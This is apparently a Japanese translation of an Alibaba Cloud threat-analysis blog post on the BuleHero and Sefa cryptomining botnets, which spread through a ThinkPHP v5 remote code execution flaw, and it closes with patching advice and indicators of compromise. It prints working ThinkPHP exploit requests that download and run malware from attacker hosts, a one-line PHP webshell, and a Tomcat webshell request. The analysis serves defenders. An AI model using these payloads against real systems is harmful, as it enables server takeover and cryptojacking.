背景

ThinkPHPチームは12月10日、ThinkPHPフレームワークのコントローラに対するチェックが不十分なことに起因するリモートコード実行の脆弱性を修正するパッチを公開した。攻撃者はこの脆弱性を悪用して、悪意のあるパラメータを偽造したり、悪意のあるコードを実行したりすることができます。Alibaba Cloudのセキュリティチームは12月11日早々にこの脆弱性に関する脅威アラートを公開し、この脆弱性を悪用した最初の攻撃事例を検出したと発表し、ユーザーにこの脆弱性を修正し、これ以上の攻撃を早急に防ぐよう注意喚起した。

最近、アリババクラウドのセキュリティ研究者は、この新しいThinkPHPの脆弱性を悪用して、複数の暗号通貨マイニングボットネットが自ら伝播し始めたことを検知した。研究者たちはこれらのボットネットのトラフィックをキャプチャすることに成功しており、本書ではその活動を分析しています。

分析のハイライト:
どちらのボットネットもワームを使って伝播しています。

1. 2つのボットネットのうちの1つのBuleHeroは、内部ネットワークを介して伝播します。

ー　1.ThinkPHPの脆弱性を持ち、インターネットにさらされているホストは、このワームに感染するリスクが高いです。
ー　2.一度感染したホストはボットネットに参加し、クリプトカレンシーのマイニングに利用されます。
ー　3.クリプトカレンシーのマイニング作業はホストのCPUリソースを消費し、日常的な活動が大幅に遅くなります。

2 . 2つ目のボットネットであるSefaは、ThinkPHPの脆弱性を利用してホストの制御を奪おうとするIoTボットネットです。

このThinkPHP v5の新たな脆弱性は非常に重大で、大きな被害をもたらす可能性があります。Alibaba Cloudのセキュリティ研究者は、より多くのボットネットがこの脆弱性を悪用して伝播すると予測しています。この記事の最後に記載されているソリューションを利用して攻撃を防ぐことを強くお勧めします。

本ブログは英語版からの翻訳です。オリジナルはこちらからご確認いただけます。一部機械翻訳を使用しております。翻訳の間違いがありましたら、ご指摘いただけると幸いです。

Blue Heroの詳細な分析

Bulehero.inというドメイン名から名付けられたBuleheroは、複数のセキュリティ脆弱性を悪用し、Windowsサーバーを制御して暗号通貨を採掘するボットネットです。

Alibaba Cloudのセキュリティチームは、BuleheroがThinkPHPのリモートコマンドを使って脆弱性攻撃を仕掛け、12月19日から伝播していることを発見した。

脆弱性を利用した悪用

ThinkPHPの脆弱性が悪用され、悪意のあるバイナリファイルをダウンロードして実行されます。このファイルは、さらにダウンロードを開始し、モネロコインを採掘するために使用されるクリプトカレンシーマイナーを含む複数の実行ファイルをリリースします。追加の脆弱性悪用モジュールを使用して、ボットネットのワームをさらに広めています。

脆弱性の搾取方法#1
このメソッドは PowerShell コードを直接実行して、payloadに対する攻撃を開始します。

s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe

脆弱性の搾取方法#2
この方法は脆弱性を悪用して hydra.php という名前の Webshell をアップロードし、バックドアコマンドを実行した後に PowerShell コードを実行して payload1 に対して攻撃を開始することができます。

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<? php $action = $_GET['xcmd'];system($action);? ^>>hydra.php

payload2に対する攻撃を開始する。

 /hydra.php? xcmd=cmd.exe /c powershell (new-object System.Net.WebClient). DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe

社内ネットワークへの脅威

BuleHeroは多くの脆弱性を悪用して内部ネットワークに拡散し、企業の内部ネットワークに重大なセキュリティ脅威をもたらします。BuleHeroはローカルIPアドレスを取得し、http://2018.ip138.com/ic.asp にアクセスしてパブリックIPアドレスを取得し、C:WindowsInfusedAppePriessip.txtの下にスキャンしたIPのIPセグメントを生成します。

IPセグメントには、ローカルネットワークのセグメントB、対応するパブリックネットワークのセグメントB、ランダムに生成されたパブリックネットワークアドレスが含まれています。BuleHeroは、まずEternalBlue exploit (https://en.wikipedia.org/wiki/EternalBlue )と "ipc$"を使用して445番ポートと139番ポートに対するブルートフォース攻撃を開始した後、Webフレームワークの脆弱性を悪用して侵入を実行します。

図1：スキャンしたアドレスの生成

図2：内部ネットワークアドレスのスキャン

図3: ThinkPHP v5の脆弱性を悪用

BuleHero サイバー攻撃の動向

Alibaba Cloudのセキュリティチームは12月19日、BuleHeroがThinkPHP v5でこの脆弱性を悪用する新たな攻撃手法を使い始めたことを発見した。この日以降、BuleHeroのネットワーク攻撃が大幅に増加しており、伝播ペースが非常に速いことがわかります。

BuleHeroが使用しているその他の脆弱性の悪用方法には、以下のようなものがあります。

−１、Tomcat PUT 任意ファイルアップロードの脆弱性 (CVE-2017-12615)
この脆弱性を利用して、FxCodeShell.jspという名前のWebshellをアップロードし、ファイルをダウンロードして実行することができます。

/FxCodeShell.jsp? wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe

2、Struts2リモートコード実行の脆弱性 (CVE-2017-5638)
3、WebLogic WLSコンポーネントのリモートコード実行の脆弱性 (CVE-2017-10271)
4、EternalBlueの脆弱性 (MS-17-010)
5、ipc$ ブルートフォース攻撃（ブルートフォース攻撃を行うための弱いパスワードを最初に使用し、次にミミカッツで権限を昇格させる

Sefaの詳細な分析

12月25日、Alibaba Cloudは、悪名高いMirai IoTボットネットの亜種であるSefaボットネットが、ThinkPHP v5の脆弱性を悪用して広く伝播し始めたことを検知した。BuleHeroと同様に、SefaはIoTネットワークを構築してMoneroコインを採掘することに焦点を当てています。キャプチャされたSefaのサンプルは、ThinkPHP v5の脆弱性を悪用して、IoTデバイスを超えてLinuxサーバーを制御し、クリプトカレンシーを採掘するようになりました。

脆弱性を利用した悪用

ThinkPHPの脆弱性を悪用して、コインマイニングソフトウェアMcoinをダウンロードするシェルファイルと、ワームを拡散するために使用されるランダムに生成されたIPアドレスをスキャンする攻撃モジュールsefa.x86をダウンロードして実行します。

payloadを攻撃し、悪用する：

s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget http://205.185.113.123/ex.sh;chmod 777 ex.sh;sh ex.sh

シェルファイル:

攻撃モジュールのデコンパイル (XOR キー: 0x04)

payloadに対する攻撃を開始します:

セキュリティの推奨事項

1、アリババクラウドのセキュリティチームは、使用しているすべてのユーザーに警告します。
ThinkPHP v5でフレームワークを最新版にアップグレードするには、できるだけ早く（v5.0.23とv5.1.31はセキュアです）、最新版にアップグレードすることをお勧めします。
2、ThinkPHP v5をすぐに最新版にアップグレードできないユーザーは、アリババクラウドのWebアプリケーションファイアウォール（WAF）を利用して、攻撃から保護し、正常な業務運営を確保することをお勧めします。
3、アリババクラウドが提供するCloud Firewallを購入したユーザーは、Cloud IPS機能の迎撃モードと仮想パッチ機能を有効にすることができます。Cloud Firewallは、先行する攻撃手法の自動保護とブロックをサポートしています。
4、さらに、マネージドセキュリティサービス(MSS)を利用して、アリババクラウドのセキュリティ専門家の協力を得て、ネットワークセキュリティを強化、最適化し、前述の攻撃からシステムを保護することができます。

IoCs

悪質なリンク
hxxp://a46[.]bulehero[.]in/download.exe

  hxxp://a46[.]bulehero[.]in/mscteui.exe
    hxxp://a88[.]bulehero[.]in:57890/Cfg.ini
hxxp://205[.] 185[.] 113[.]123/ex.sh

hxxp://205[.] 185[.] 113[.]123/mcoin
hxxp://205[.] 185[.] 113[.]123/bins/sefa.x86
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm7
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm5
hxxp://205[.] 185[.] 113[.]123/bins/sefa.arm6
hxxp://205[.] 185[.] 113[.]123/bins/sefa.m68k
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mips
hxxp://205[.] 185[.] 113[.]123/bins/sefa.mpsl
hxxp://205[.] 185[.] 113[.]123/bins/sefa.ppc

悪質なファイル

アリババクラウドは日本に２つのデータセンターを有し、世界で60を超えるアベラビリティーゾーンを有するアジア太平洋地域No.1(2019ガートナー)のクラウドインフラ事業者です。
アリババクラウドの詳細は、こちらからご覧ください。
アリババクラウドジャパン公式ページ